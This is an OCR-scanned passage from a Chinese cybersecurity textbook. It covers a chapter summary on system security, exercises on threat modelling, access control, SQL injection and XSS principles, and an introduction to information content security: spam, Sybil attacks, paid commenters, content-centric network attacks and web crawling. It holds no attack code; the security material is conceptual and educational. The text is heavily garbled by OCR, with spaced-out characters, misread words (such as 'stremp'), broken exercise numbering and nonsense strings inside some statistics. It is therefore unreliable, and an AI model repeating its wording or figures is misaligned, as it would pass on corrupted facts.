互联 网 触角 的 延伸 , 物 联网 应 用 的 普及 ,促使 网 络 空间 疆域 极速 扩大 ,系统 安全 不 停 演化 ， 
一 步 步 向 安全 生态 系统 迈进 。 

作为 网 络 空间 安全 学 科 中 的 一 个 知识 领域 ,系统 安全 从 系统 的 角度 研究 和 应 对 安全 
问题 ,一 方面 ,系统 指 因为 必然 面临 安全 威胁 而 需要 保护 的 对 象 , 另 一 方面 ,系统 指 在 分 析 
和 解决 安全 问题 的 时 候 应 该 遵循 的 指导 思想 。 它 既 关 注 对 象 ,也 强调 思想 ,提倡 运用 系统 
化 思维 为 系统 增加 安全 弹性 。 涉 足 系统 安全 ,两 方面 都 要 兼顾 ,不 朴 漏 。 
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正确 认识 系统 是 进行 系统 安全 之 旅 的 开端 。 与 其 他 科学 领域 相 比 ,网 络 空间 安全 非 
常年 轻 , 值 得 借用 他 山 之 石 以 更 好 地 走向 成 熟 。 网 络 空间 中 的 系统 与 自然 界 中 的 系统 有 
相同 之 处 ,系统 安全 研究 可 以 从 研究 普 适 系统 的 系统 科学 中 吸取 养分 ,可 以 从 研究 自然 生 

欲 善 其 事 , 须 明 其 理 。 系 统 安全 学 科 领 域 的 最 终日 标 是 提升 系统 的 安全 性 ,实现 这 一 
目标 需要 有 科学 的 理论 体系 为 之 支撑 。 学 习 系 统 安全 应 该 了 解 这 个 学 科 领 域 中 的 重要 原 
理 。 系 统 化 安全 思想 要 求 系统 的 建设 者 了 解 安全 建设 的 基本 原则 ,明白 威胁 建 模 的 重要 
性 ,清楚 事前 预防 和 事后 补救 的 道理 ,懂得 使 安全 建设 落 到 实处 的 招数 。 

系统 安全 思维 的 要 义 是 合理 地 运用 整体 论 和 还 原 论 。 按 照 还 原 的 方法 ,网 络 空间 中 
的 系统 可 以 看 成 包含 硬件 .操作 系统 .数据库 系 统 和 应 用 系统 等 层次 。 硬 件 系统 安全 、 操 
作 系统 安全 ,数据库 系统 安全 和 应 用 系统 安全 是 系统 安全 在 体系 结构 角度 的 重要 关注 点 ， 
必须 注意 ,系统 安全 不 是 孤立 地 看 待 这 些 点 ,而 是 要 观察 它们 所 形成 的 面 。 整 体 论 带 来 的 
启示 是 认识 网 络 空间 中 的 系统 需要 有 生态 系统 的 思想 ,研究 系统 安全 需要 有 安全 生态 系 
统 的 视野 。 

故此 ,本 章 从 俯 欧 概况 .关键 原理 .体系 结构 等 方面 对 系统 安全 进行 了 讨论 ,希望 读者 
在 阅读 这 些 内 容 的 时 候 能 明白 上 述 用 意 ,果真 如 此 ,也 许 能 更 好 地 认识 和 把 握 系统 安全 。 


44 习题 


1. 为 什么 Adept-50 安全 操作 系统 只 能 在 CTSS 分 时 操作 系统 问世 之 后 才 会 出 现 ? 
请 从 技术 角度 加 以 分 析 。 
2. 无 论 是 在 技术 方面 还 是 在 工具 方面 .与 20 世纪 60 年 代 相 比 ,现在 的 情况 都 好 得 
多 ,请 分 析 为 什么 现在 解决 系统 安全 问题 比 20 世纪 60 年 代 困 难得 多 。 
3. 操作 系统 通常 由 进程 管理 ,内存 管理 、 外 设 管理 ,文件 管理 .处 理 器 管理 等 子 系统 
组 成 ,是 不 是 把 这 些 子 系统 的 安全 机 制 实现 好 了 ,操作 系统 的 安全 目标 就 实现 了 ? 为 
什么 ? 
4. 通过 对 操作 系统 内 部 的 进程 管理 ,内存 管 理 、 外 设 管理 ,文件 管理 处理 器 管理 等 
子 系统 的 运行 细节 来 分 析 操 作 系 统 的 行为 ,这 样 观察 系统 的 方法 是 否 属于 自 内 观察 法 ? 
为 什么 ? 
5. 涌现 性 和 综合 特性 都 是 整体 特性 .但 它们 是 不 同 的 ,请 结合 实例 ,分 析 说 明 两 者 的 
区 别 。 
6. 请 以 操作 系统 和 机 密 性 为 例 , 分 析 说 明 为 什么 系统 的 安全 性 是 不 可 能 指望 依靠 还 
原 论 的 方法 建立 起 来 的 。 
7. 请 分 析 说 明 如 何 借助 对 人 的 幸福 感 的 观察 去 帮助 理解 操作 系统 安全 性 的 含意 ,并 
以 此 解释 系统 化 思维 的 含义 。 
8. 请 以 桥梁 的 坚固 性 保障 措施 为 启发 ,分 析 说 明 如 何 通过 系统 安全 工程 建立 操作 系 
统 的 安全 性 。 
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9. 请 分 析 说 明 “ 失 败 -保险 默认 原则 ”的 名 称 与 该 原则 的 实际 含义 是 否 吻合 ,请 给 出 你 
的 理由 。 
0. 请 谈 谈 “公开 设计 原则 ”的 利 与 丙 , 并 分 析 说 明 如 何 衡 量 遵 守 该 原则 是 否 有 利于 
提高 系统 的 安全 性 。 
1. 请 以 Adept-50 安全 操作 系统 作为 分 析 的 例子 ,分 析 说 明 威胁 、 风 险 、 攻 击 、 安 全 之 
间 存 在 什么 样 的 关系 。 
2. 请 简要 叙述 STRIDE 威胁 建 模 方法 的 基本 思路 ,并 据 此 说 明 它 属于 以 下 哪 种 类 
型 的 威胁 建 模 方法 : 以 风险 为 中 心 .以 资产 为 中 心 .以 攻击 者 为 中 心 、 以 软件 为 中 心 。 
3. 请 从 访问 控制 策略 的 分 类 角度 ,分 析 说 明基 于 角色 的 访问 控制 应 该 划 归 自主 访 
问 控制 类 还 是 强制 访问 控制 类 。 
A. 访问 控制 策略 2 只 考虑 了 给 一 个 用 户 分 配 一 个 角色 的 情形 ,如 果 人 允许 给 一 个 用 
户 分 配 多 个 角色 ,应 该 如 何 修改 该 策略 ? 请 给 出 你 的 修改 方案 。 
5. 请 分 析 说 明基 于 特征 的 入 侵 检测 和 基于 异常 的 人 侵 检测 各 有 什么 优 缺 点 ,并 说 
明 机 器 学 习 技 术 更 适合 于 其 中 哪 类 检测 。 
6. 请 对 安全 管理 和 风险 的 概念 进行 分 析 , 以 此 为 基础 ,说 明 在 安全 管理 工作 中 为 什 
么 要 遵循 风险 管理 原则 。 
7. 每 个 系统 总 会 由 多 个 子 系统 构成 ,请 先 举 一 个 网 络 空间 中 的 系统 的 例子 ,然后 结合 
该 例子 ,分析 说 明 为 什么 安装 和 印 载 子 系统 都 要 作为 系统 安全 领域 安全 管理 的 重要 工作 。 
8. 请 先 给 出 用 SHA1 和 stremp 函数 检测 操作 系统 代码 是 否 被 算 改 过 的 方法 ,然后 
分 析 说 明基 于 软件 的 这 种 检测 方法 主要 存在 什么 不 足 。 
9. 请 简要 说 明 物理 不 可 克隆 函数 (PUF) 硬 件 器 件 主要 能 提供 什么 功能 ,并 说 说 这 
种 硬件 器 件 可 用 于 应 对 什么 安全 问题 。 

20. 设计 算 机 配 有 硬件 加 密 解密 功能 , 现 需要 一 个 给 文件 加 密 的 应 用 程序 ,请 分 析 说 
明 如 果 不 需 要 操作 系统 配合 ,实现 这 样 的 应 用 程序 会 遇 到 什么 困难 。 

21. 请 分 析 说 明 操 作 系统 提供 的 对 文件 进行 的 自主 访问 控制 与 对 内 存 进行 的 访问 控 
制 有 哪些 相同 之 处 和 不 同 之 处 。 

22. 请 结合 例子 说 明基 于 内 容 的 数据 库 访问 控制 的 基本 原理 。 

23. 请 结合 例子 说 明 针对 数据 库 应 用 的 SQL 注入 攻击 的 基本 原理 。 

24. 请 分 析 说 明 跨 站 脚本 (XSS) 攻 击 威 胁 会 给 Web. 应 用 系统 带 来 什么 样 的 安全 

25. 请 简要 说 明 访问 网 站 时 涉及 的 cookie 是 什么 东西 ,并 结合 例子 分 析 说 明 它 是 如 
何 泄露 个 人 敏感 信息 的 。 

26. 请 说 出 自然 生态 系统 和 互联 网 生态 系统 的 组 成 部 分 分 别 有 哪 些 ,并 说 说 如 何 通 
过 观察 前 者 的 相互 作用 分 析 后 者 的 相互 作用 。 

27. 请 以 跨 站 脚本 (XSS) 攻 击 威胁 为 例 , 设 计 一 个 运用 安全 生态 系统 思想 实现 Web 
应 用 环境 下 个 人 敏感 信息 保护 的 方案 。 
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信息 内 容 安 全 是 日 益 受 到 越 来 越 多 的 重视 并 得 到 不 断 发 展 的 领域 , 它 跨越 多 媒体 信 
息 处 理 、 安 全 管理 .计算 机 网 络 .网 络 应 用 等 多 个 研究 领域 ,直接 和 间接 地 应 用 各 个 研究 领 
域 的 最 新 研究 成 果 ,结合 信息 内 容 安全 管理 的 具体 需求 ,发 展 出 具有 自己 特点 的 研究 方向 
和 应 用 。 本 章 将 从 信息 内 容 安全 概述 .信息 内 容 安全 威胁 .信息 内 容 获 取 和 分 析 处 理 基 本 
技术 ,以 及 以 网 络 与 情 内 容 检测 预警 和 内 容 中 心 网 络 为 代表 的 信息 内 容 安全 应 用 等 角度 
展开 介绍 。 


51 信息 内 容 安全 概述 


全 球 信息 化 的 今天 ,互联 网 将 朝 着 开放 性 、 异 构 性 、 移 动 性 、 动 态 性 .并 发 性 的 方向 发 
展 。 通 过 不 断 演化 ,产生 了 下 一 代 互 联网 .5G 移动 通信 网 络 、 移 动 互联 网 、 物 联网 等 新 型 
网 络 形式 以 及 云 计算 等 服务 模式 。 同 时 , 随 着 工业 4.0 影响 全 球 和 我 国 实施 “互联 网 十 ” 
行动 ,互联 网 与 各 个 行业 的 融合 也 日 益 加 深 , 创 造 了 巨大 的 经 济 效益 和 社会 效益 ,互联 网 
已 成 为 人 们 获取 信息 、 互 相交 流 、 协 同 工 作 的 重要 途径 ,具有 应 用 极为 广泛 .发展 规 模 最 
大 、 贴 近 人 们 生活 等 众多 优点 。 

伴随 社会 信息 化 和 网 络 化 的 发 展 ,当前 全 球 数据 正在 呈现 爆炸 式 增长 ,数据 内 容 成 为 
互联 网 的 中 心 关注 点 。 有 统计 表明 ,在 每 一 分 钟 里 Facebook 用 户 会 新 共享 68.4 万 比特 
的 内 容 .Twitter 用 户 会 新 发 出 超过 10 71 ZR TEE, YouTube 用 户 会 上 传 48 小 时 的 新 视 
Jii Instagram 用 户 会 共享 3600 张 新 照 片 ,2020 年 的 全 球 信息 总 量 预计 可 达 35ZB。 互 联 
网 中 的 数据 和 内 容 已 经 引起 了 学 术 界 和 产业 界 的 广泛 关注 ,2014 年 ,Gartner 新 技术 成 熟 
周期 分 析 报 告 显 示 , 大 数据 技术 正在 逐步 演化 成 生产 力 ,已 经 成 为 诸多 重要 IT 技术 和 应 
用 领域 的 核心 。 近 年 来 各 国 也 己 从 国家 战略 视角 高 度 重视 通过 互联 网 获取 、 掌 握 威胁 国 
家 政治 经济 ,文化 乃至 军事 安全 的 情报 信息 。 随 着 5G 在 全 球 范围 内 的 部 署 以 及 6G dx 
术 的 发 展 ,到 2030 年 ,预计 有 万 亿 级 智能 设备 接 和 网络 ,每 秒 太 比特 的 数据 量 将 被 处 理 ， 
进一步 促进 了 数据 驱动 型 的 网 络 与 社会 的 形成 与 发 展 。 此 外 , 随 着 网 络 技术 和 移动 智能 
设备 的 快速 发 展 ,互联 网 逐步 由 传统 媒体 向 社交 网 络 等 新 型 媒体 演进 ,例如 微 信 、QQ、 新 
浪 微 博 、Facebook 等 社交 网 络 工具 。 互 联网 和 新 兴 媒 体 的 发 展 带 来 了 一 些 负面 影响 ,不 
良 信息 在 网 络 上 大 量 传播 ,垃圾 电子 邮件 、Sybil 攻击 、 网 络 水 军 攻击 等 不 正当 行为 泛滥 ， 
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利用 网 络 传播 电影 ,音乐 .软件 侵犯 知识 产权 ,其 至 通过 网 络 钓鱼 方式 欺诈 网 络 用 户 以 及 
T9258 35 7] fl E 2 224i 3 3,18 75$, Facebook Live 自 上 线 以 来 已 经 出 现 至 少 45 起 暴力 事 
件 , 包 括 枪击 .谋杀 等 恶性 事件 ,给 社会 造成 了 极其 恶劣 的 影响 。 因 此 ,在 以 信息 内 容 为 中 
心 的 互联 网 环境 下 ,网 络 信息 内 容 的 安全 值得 广泛 关注 和 深入 研究 。 

互联 网 上 各 种 不 良 信息 流传 以 及 不 规范 行为 的 产生 原因 可 归结 为 两 类 。 一 类 是 由 于 
在 互联 网 爆炸 性 发 展 过 程 中 ,相关 方面 的 规范 和 管理 措施 未 能 同步 发 展 。 在 互联 网 发 展 
的 初期 阶段 ,用 户 数目 很 少 ,多 数 是 学 术 研究 人 员 ,网 络 也 没有 用 于 商业 用 途 ,网络 安 全 的 
问题 并 不 突出 。 如 今 这 些 情 况 都 已 经 发 生 了 巨大 的 变化 ,一 些 原 有 网 络 模式 不 再 适应 现 
在 的 情况 。 另 外 一 类 原因 是 互联 网 在 为 人 们 提供 便利 获取 与 发 布 信息 的 同时 ,也 制造 了 
前 所 未 有 的 思想 碰撞 场所 ,因而 在 互联 网 中 更 容易 出 现 一 些 另类 、 新 奇 . 不 易 理 解 或 不 符 
合 规范 的 行为 。 互 联网 将 整个 世界 变 成 了 “地 球 村 ”, 将 持 有 各 种 思想 、 观 点 的 人 聚集 在 一 
起 ,这 也 将 是 一 个 长 期 存在 的 客观 现实 。 面 对 这 种 挑战 ,一 方面 ,人们 不 应 因 嘻 废 食 ,因为 
互联 网 上 存在 的 一 些 不 良 现象 而 县 惧 或 排斥 新 技术 .新 事物 ; 另 一 方面 ,应 当 通 过 法 律 与 
技术 等 多 方面 措施 限制 与 消除 这 些 不 良 现象 ,让 互联 网 更 好 地 为 人 民 服 务 ,发 挥 更 大 的 效 
日 ,使 得 人 人 都 能 更 高 效 、 更 自由 地 使 用 互联 网 进行 信息 沟通 。 

信息 内 容 安 全 (Content-based Information Security) 作为 对 上 述 问 题 的 回答 ,是 研 
究 利 用 计算 机 从 包含 海量 信息 并 且 迅 速 变化 的 网 络 中 对 特定 安全 主题 相关 信息 进行 自动 
获取 ,识别 和 分 析 的 技术 。 根 据 它 所 处 的 网 络 环境 ,也 称 为 网 络 内 容 安 全 (Content-based 
Network Security)。 信 息 内 容 安全 是 借助 人 工 智能 与 大 数据 技术 管理 网 络 信息 传播 的 
重要 手段 ,属于 网 络 安全 系统 的 核心 理论 与 关键 组 成 部 分 ,对 提高 网 络 使 用 效率 、 净 化 网 
络 空 间 ,保障 社会 稳定 具有 重大 意义 。 

大 力 推进 信息 化 是 我 国 现代 化 建设 的 战略 举措 ,也 是 贯彻 落实 科学 发 展 观 ,全 面 建设 
小 康 社会 和 建设 创新 型 国家 的 迫切 需要 和 必然 选择 。 信 息 内 容 安全 作为 网 络 安全 中 智能 
信息 处 理 的 核心 技术 ,为 先进 网 络 文化 建设 ,加 强 社会 主义 先进 文化 的 网 上 传播 提供 了 技 
术 支 撑 , 属 于 国家 信息 安全 保障 体系 的 重要 组 成 部 分 。 因 此 ,信息 内 容 安全 研究 不 仅 具有 
重要 的 学 术 意 义 ,也 具有 重要 的 社会 意义 。 


”52 ”信息 内 容 安 全 威胁 


从 内 容 安 全 要 解决 的 主要 问题 及 其 解决 方案 来 看 ,内 容 安全 和 计算 机 安全 一 样 ,主要 
建立 在 保密 性 、 完 整 性 .可 用 性 之 上 ,典型 的 信息 内 容 安全 挑战 如 图 5-1 所 示 。 
在 分 析 内 容 安全 的 问题 之 前 ,首先 要 搞 清 楚 对 安全 的 威胁 来 自 何方 。 在 互联 网 ,电信 
网 ,电视 网 等 各 类 网 络 信息 共享 环境 中 ,一 方面 ,内 容 安全 所 面临 的 威胁 有 泄露 ( 指 对 信息 
的 非 授 权 访问 ) 欺骗 .破坏 和 自 夺 等 ; 另 一 方面 ,一 些 恶意 用 户 产 生 并 传播 的 恶意 内 容 也 
是 网 络 空间 面临 的 潜在 安全 威胁 。 下 面 首 先 对 泄露 .欺骗 .破坏 和 复 夺 等 威胁 进行 详细 的 
描述 。 
首先 ,互联 网 中 有 大 量 公开 的 信息 ,例如 某 人 的 姓名 、 工 作 单位 、 住 宅地 址 ,电话 号 码 
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动态 网 络 社区 信息 的 深入 提取 
内 容 获取 | 一 =| 路 网 络 媒体 内 容 的 高 性 能 提取 
混 人 台 网 络 身份 内 容 获取 


多 源 网 络 媒体 信息 的 数据 清洗 
内 容 分 析 —- 海量 非 结构 化 信息 的 数据 仓储 与 数据 挖掘 
多 媒体 群体 理解 技术 
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内 容 中 心 网 络 命名 攻击 
内 容 网 络 | 一 =| 内 容 中 心 网 络 缓存 污染 
容 中 心 网 络 路 由 攻击 
图 5-1 典型 的 信息 内 容 安全 挑战 


等 ,由 于 这 些 公开 信息 的 获取 成 本 非常 低 , 在 某 些 情况 下 ,这 些 信息 会 被 整合 ,并 可 能 会 被 
滥用 ,例如 , 某 些 公 司 会 将 这 些 数据 作为 商业 信息 出 售 ,还 有 些 诈骗 集团 会 利用 这 些 信息 
进行 诈骗 。 所 以 ,互联 网 上 的 信息 泄露 可 以 指 将 特定 信息 向 特定 相关 人 或 组 织 进行 传播 ， 
以 妨碍 特定 相关 人 或 组 织 的 正常 生活 或 运行 。 其 次 ,互联 网 的 开放 性 和 自主 性 导致 信息 
由 各 个 组 织 自 发 生成 并 共享 到 互联 网 中 ,这 带 来 了 很 多 欺骗 的 威胁 ,互联 网 的 地 址 和 
www 的 内 容 都 存在 伪造 的 可 能 ,这 些 是 互联 网 中 无 法 保证 信息 完整 性 (尤其 是 信息 来 源 ) 
造成 的 。 再 次 ,信息 还 会 被 非法 传播 ,在 很 多 网 络 中 被 发 现 具有 知识 产权 的 音乐 和 电影 被 
广泛 传播 ,造成 了 知识 产权 被 践踏 。 最 后 ,信息 在 传播 过 程 中 也 可 能 被 复 改 , 自 改 信息 的 
目的 可 能 是 消除 信息 的 来 源 信息 ,使 之 无 法 跟踪 ;也 可 能 是 伪造 信息 的 内 容 。 此 外 ,信息 
算 改 后 还 会 包括 病毒 或 者 木马 ,这 些 有 害 于 计算 机 系统 数据 的 代码 将 不 仅 对 所 在 的 信息 
载体 带 来 破坏 ,还 会 直接 危害 到 软 硬 件 系统 的 安全 。 

随 着 Facebook、 微 博 等 在 线 社交 媒体 平台 的 发 展 ,人 们 交流 、 沟 通 、 获 取信 息 的 方式 
产生 了 巨大 变革 。 个 人 用 户 由 传统 的 内 容 接 收 者 转变 为 内 容 的 创造 者 和 传播 者 。 在 此 过 
程 中 ,除了 上 述 基于 保密 性 、 完 整 性 、 可 用 性 的 安全 问题 ,网 络 空 间 还 面临 着 恶意 用 户 制造 
传播 恶意 内 容 所 带 来 的 潜在 安全 威胁 。 下 面 分 别 介绍 几 种 典型 的 互联 网 恶意 用 户 行为 威 
胁 。@Spam 用 户 的 恶意 行为 通常 出 现在 邮件 或 者 网 页 中 ,该 行为 表现 为 向 一 些 合法 的 
用 户 发 布 广告 .色情 .钓鱼 等 恶意 信息 。Spam 用 户 行为 的 主要 攻击 方法 是 通过 创建 大 量 

的 虚假 账号 ,在 邮件 或 者 网 页 中 推荐 一 些 网 页 链接 ,来 欺骗 诱导 用 户 进入 推荐 的 网 站 或 恶 

意 的 网 站 。 最 早 的 Spam 行为 始 于 邮件 系统 ,可 以 追溯 到 互联 网 的 产生 。 早 在 1978 年 ， 

第 一 个 邮件 Spam 就 对 阿 帕 网 的 几 百 个 用 户 进 行 了 攻击 。 近 年 来 ,无 论 是 国外 的 

Twitter, 还 是 国内 的 微 博 ,都 曾 受 到 Spam 行为 的 困扰 。 那 些 曾经 在 电子 邮件 领域 横行 

的 Spammer 找到 了 新 的 乐土 ,在 开放 式 在 线 社交 网 络 上 将 恶意 内 容 快 速 而 大 规模 地 传播 

出 去 。 该 方式 比 传统 的 定点 群发 邮件 的 传播 方式 更 加 有 有效。 在线 社 交 平 台 上 的 Spam 行 
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为 毫 无 疑问 会 破坏 平台 环境 ,威胁 平台 用 户 隐 私 和 财产 安全 。@Sybil 攻击 是 目前 兴起 的 
另 一 种 恶意 行为 攻击 方式 , 即 由 少数 节点 控制 多 个 虚假 身份 ,并 利用 这 些 身份 来 控制 或 影 
响 网 络 的 大 量 正 常 个 体 的 行为 ,以 达到 宛 余 备份 的 作用 。Sybil 攻击 最 早出 现在 无 线 通信 
领域 中 ,2002 年 ,美国 学 者 Douceur 第 一 次 在 点 对 点 网 络 环境 中 提出 了 Sybil 攻击 的 概 
念 。 这 种 攻击 将 破坏 分 布 式 存储 系统 中 的 宛 余 机 制 ,达到 削弱 网 络 的 宛 余 性 ,降低 网 络 健 
壮 性 ,监视 或 干扰 网 络 正常 活动 等 目的 。 后 来 学 者 们 发 现 Sy bil 攻击 对 传感器 网 络 中 的 
路 由 机 制 同样 存在 着 威胁 。 在 线 社交 网 络 用 户 之 间 缺 乏 物 理 上 的 接触 ,这 成 为 Sybil 攻 
击 在 在 线 社交 平台 盛行 的 一 个 有 利 条 件 。Facebook 的 一 个 调查 报告 表明 ,超过 8300 万 
个 的 Facebook 用 户 都 可 能 是 Sybil 用 户 。Sybil 用 户 在 以 信任 为 基础 的 社交 网 络 上 的 恶 
意 行为 更 加 隐蔽 ,使 得 社交 平台 所 面临 的 威胁 愈加 严峻 。 

水 军用 户 的 恶意 行为 是 网 络 空间 面临 的 另 一 大 严重 威胁 。 水 军用 户 通过 评论 或 者 转 
发 参与 热点 话题 ,以 大 量 有 情感 倾向 的 评论 影响 与 情态 势 。 以 微 博 为 代表 的 开放 式 网 络 
平台 聚集 了 大 量 用 户 创造 的 内 容 , 同 时 用 户 之 间 建 立 起 了 错综复杂 的 巨大 的 关系 网 络 ,这 
些 特 点 使 得 开放 式 社交 网 络 媒体 成 为 了 网 络 水 军 的 生存 乐土 ,催生 了 集 网 络 推手 、 网 络 打 
手 、 刷 粉 等 功能 于 一 身 的 网 络 新 水 军 。 水 军营 销 是 目前 互联 网 平台 常用 的 一 种 营销 行为 ， 
对 于 企业 来 说 ,可 以 通过 雇佣 水 军 对 自己 的 产品 进行 宣传 。 然 而 由 于 利益 的 驱使 ,水 军营 
销 渐 渐 地 走向 了 歧途 ,也 使 得 整个 产业 渐渐 蒙 上 了 阴影 。 水 军 对 与 情态 势 的 影响 也 不 容 
小 视 。 通 过 购买 大 量 水 军 在 热点 微 博 下 进行 同一 情感 倾向 的 评论 ,可 以 达到 混淆 公众 视 
听 、 影 响 公 众 情感 态度 的 效果 。 这 种 对 与 情态 势 的 影响 其 至 会 影响 社会 稳定 和 国家 安全 ， 
需要 引起 足够 的 重视 。 

另 一 方面 ,以 内 容 为 中 心 的 未 来 互联 网 旨 在 将 内 容 名 称 而 不 是 IP 地 址 作为 传输 内 
容 的 标识 符 , 从 而 实现 信息 的 路 由 。 内 容 中 心 网 络 更 适合 大 数据 的 内 容 分 发 ,可 以 在 网 络 
层 实 现 高 效 的 检索 机 制 。 事 实 上 ,内 容 中 心 网 络 为 未 来 互联 网 带 来 了 许多 好 处 。 首 先 , 互 
联网 中 以 信息 为 中 心 的 内 容 将 包含 底层 信息 的 内 容 、 属 性 和 关系 ,从 而 引入 大 量 语义 和 情 
感 特征 。 因 此 ,可 以 实施 更 多 优化 表示 来 增强 网 络 性 能 。 其 次 ,信息 中 心 网 络 在 大 数据 内 
容 分 发 过 程 中 能 够 提供 更 智能 的 分 析 , 这 种 分 析 可 以 以 提高 未 来 互联 网 的 智能 水 平 的 方 
式 进行 。 内 容 中 心 网 络 具 有 许多 独特 的 属性 ,如 位 置 独立 命名 、 网 络 内 缓存 、 基 于 名 称 的 
路 由 和 内 置 安全 性 。 在 内 容 中 心 网 络 体系 结构 中 ,除了 可 能 对 网 络 流量 产生 影响 的 旧式 
攻击 之 外 ,还 出 现 了 新 的 攻击 。 信 息 中 心 网 络 将 安全 模型 从 保护 转发 路 径 更 改 为 保护 内 
容 使 其 可 以 为 所 有 网 络 节点 使 用 。 内 容 中 心 网 络 攻 击 可 以 分 为 命名 、 路 由 、 缓 存 和 其 他 攻 
击 。 命 名 攻击 可 以 分 为 监视 列表 和 嗅 探 攻 击 。 这 些 攻击 允许 攻击 者 审查 和 过 滤 内 容 。 攻 
击 者 还 可 以 获取 有 关内 容 流行 性 和 用 户 兴趣 的 私人 信息 。 考 虑 到 信息 中 心 网 络 的 数据 是 
根据 名 称 进行 路 由 和 缓存 的 ,发 布 者 在 向 网 络 中 发 布 内 容 时 会 依据 相关 的 命名 规则 ,将 数 
据 的 有 关 属 性 、 特 征 和 内 容 包 装 为 数据 名 称 ,从 而 暴露 在 网 络 中 ;订阅 者 在 向 网 络 中 发 布 
请 求 时 ,也 会 依次 将 所 需要 数据 的 相关 信息 包装 为 数据 名 称 并 将 其 以 兴趣 包 的 形式 发 布 
到 网 络 中 。 因 此 数据 名 称 本 身 携带 了 内 容 信 息 。 通 过 对 名 称 中 暴露 出 的 信息 进行 挖掘 和 
延展 ,攻击 者 可 以 从 中 获得 有 关内 容 的 信息 ,并 通过 语义 方面 的 模糊 化 和 替换 ,对 需求 进 
行 混淆 ,从 而 可 以 将 并 非 订阅 者 真实 需要 的 内 容 发 送 给 对 方 , 以 达到 不 同 目 的 上 的 欺骗 攻 
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击 。 内 容 中 心 网 络 的 常见 路 由 攻击 是 指 恶 意 发 布 者 和 订阅 者 可 以 发 布 和 订阅 无 效 的 内 容 
或 路 由 。 内 容 中 心 网 络 缓存 容易 受到 不 同类 型 的 攻击 ,这 些 攻击 会 污染 或 破坏 缓存 系统 ， 
此 外 还 有 缓存 内 容 和 未 缓存 内 容 之 间 的 差异 ,这 些 攻击 会 侵犯 信息 中 心 网 络 隐私 。 其 他 
路 由 攻击 则 表现 为 在 传输 过 程 中 未 经 授权 地 访问 和 更 改 内 容 。 


_ 5.3 网 络 信息 内 容 获取 


正 处 于 内 容 爆 炸 性 增长 的 国际 互联 网 、 电 信和 网 .电视 网 等 各 类 网 络 包 含 了 琳琅 满目 、 
内 容 过 异 的 各 式 信息 。 在 网 络 媒体 信息 与 网 络 通信 信息 凯 布 世界 各 个 角落 的 今天 ,面向 
海量 网 络 信息 实现 全 面 或 有 针对 性 的 内 容 获取 ,已 经 成 为 信息 内 容 安全 研究 领域 中 的 重 


5.3.1 网络 信息 内 容 获 取 技 术 


与 面向 特定 点 的 网 络 通信 信息 获取 不 同 , 网 络 媒体 信息 获取 环节 的 工作 范围 理论 上 
可 以 是 整个 国际 互联 网 。 传 统 的 网 络 媒体 信息 获取 环节 从 预先 设 定 的 ,包含 一 定数 量 
URL 的 初始 网 络 地 址 集合 出 发 ,首先 获取 初始 集合 中 每 个 网 络 地 址 对 应 的 发 布 内 容 。 网 
络 媒体 信息 获取 环节 一 方面 将 初始 网 络 地 址 发 布 信息 主体 内 容 按照 系列 内 容 判 重 机 制 ， 
有 选择 地 存 人 互联 网 信息 库 , 另 一 方面 .还 进一步 提取 已 获取 信息 内 散 的 超 链 接 网 络 地 
址 ,并 将 所 有 超 链 接 网 络 地 址 置信 待 获取 地 址 队列 ,以 "先入 先 出 ”方式 逐一 提取 队列 中 的 
每 个 网 络 地 址 发 布 信息 。 网 络 媒体 信息 获取 环节 循环 开展 待 获取 队列 中 的 网 络 地 址 发 布 
信息 获取 已 获取 信息 主体 内 容 提取 、 判 重 与 信息 存储 ,以 及 已 获取 信息 内 骸 网 络 地 址 提 
取 并 存 人 待 获取 地 址 队列 操作 ,直至 遍历 所 需 的 互联 网 络 范围 。 

理想 的 网 络 媒体 信息 获取 流程 主要 由 初始 URL 集合 一 一 信息 种子” 集合 ,等 待 获 
取 的 URL 队列 ,信息 获取 模块 ,信息 解析 模块 ,信息 判 重 模块 与 网 络 媒体 信息 库 共同 组 
成 ,如 图 5-2 所 示 。 
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5-2. 媒体 信息 获取 流程 


早期 传统 网 络 媒体 信息 获取 方法 的 技术 实质 ,可 以 统一 归属 于 采用 网 络 交互 过 程 编 

程 重 构 机 制 实 现 网 络 媒体 信息 获取 。 在 面向 互联 网 实现 公开 发 布 信息 获取 过 程 中 ,网 络 

交互 过 程 编 程 重 构 完 整 实现 网 络 信息 请 求 / 响 应 过 程 ,应 当 说 其 属于 网 络 媒体 信息 获取 的 

一 般 性 方法 。 理 论 上 只 要 掌握 网 络 通信 协议 的 信息 交互 过 程 , 就 可 以 通过 网 络 交互 重 构 
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实现 对 应 协议 发 布 信息 获取 。 不 过 , 随 着 网 络 应 用 的 逐步 深入 ,网 络 媒体 发 布 形态 不 断 推 
陈 出 新 ,不 同 网 络 媒体 信息 交互 过 程 存在 极 大 区 别 。 需 要 对 于 不 同 网 络 媒体 逐一 进行 网 
络 信息 交互 重 构 ,信息 获取 技术 实现 的 工作 量 异 常 庞 大 。 同 时 ,新 型 网 络 通信 协议 正在 不 
断 得 到 应 用 ,部 分 网 络 通信 协议 ,尤其 是 视 / 音 频 信息 的 网 络 交互 过 程 并 未 对 外 公开 发 布 ， 
无 法 直接 通过 网 络 交互 重 构 实 现 对 应 协议 发 布 信息 获取 。 

正 是 由 于 通过 网 络 交互 过 程 编程 重 构 机 制 , 在 实现 媒体 信息 获取 环节 存在 相当 程度 
的 技术 局 限 性 ,在 Web 网 站 自动 化 功能 /性 能 测试 的 启发 下 ,浏览 器 模拟 技术 在 网 络 媒体 
信息 获取 环节 正 得 到 越 来 越 广泛 的 应 用 。 基 于 浏览 器 模拟 实现 网 络 媒体 发 布 信息 获取 的 
技术 实现 过 程 是 ,利用 典型 的 JSSh 客户 端 向 内 嵌 JSSh 服务 器 的 网 络 浏览 器 发 送 
JavaScript 指令 ,指示 网 络 浏览 器 开展 网 页 表单 自动 填写 ,网 页 按钮 /链接 点 击 ,网 络 身份 
认证 交互 ,网 页 发 布 信息 浏览 ,以 及 视 / 音 频 信 息 点 播 等 系列 操作 。 

在 此 基础 上 ,JSSh 客户 端 进一步 要 求 网 络 浏览 器 导出 网 页 文本 内 容 ,存储 网 页 图 像 
信息 ,或 在 用 于 信息 获取 的 计算 机 上 对 于 正在 播放 的 视 / 音 频 信息 进行 屏幕 录像 ,最 终 面 
向 各 种 类 型 的 网 络 内 容 . 各 种 形态 的 网 络 媒体 实现 发 布 信息 获取 ,如 图 5-3 所 示 。 


MÁWEN 。 一- 一 网 页 表单 自动 填写 
内 能 JSSh 服 务 器 ! 
服 和 器 | ue rcc —— 网 页 按钮/ 链接 点 击 
_- -上 网 络 身份 认证 交互 
指令 交互 
-一 网 页 发 布 信息 浏览 
